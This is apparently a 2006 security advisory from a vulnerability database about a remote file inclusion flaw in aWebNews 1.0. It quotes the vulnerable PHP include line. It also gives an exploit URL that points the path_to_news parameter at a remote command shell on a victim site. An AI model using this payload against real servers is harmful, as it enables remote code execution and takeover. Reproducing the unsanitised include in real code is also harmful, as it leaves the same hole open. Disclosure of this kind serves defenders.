Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13116
HistoryJun 13, 2006 - 12:00 a.m.

aWebNews 1.0 version - Remote File Include Vulnerabilities

2006-06-1300:00:00
vulners.com
18

SaVSaK.CoM | SpC-x - The-BeKiR |

aWebNews 1.0 version - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : aWebNews

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx

Code :

include "" . $path_to_news . "config.php";

$db = mysql_connect($db_host,$db_user,$db_pass);

Vulnerable :

http://www.victim.com/aWebNews/visview.php?path_to_news=Command-Shell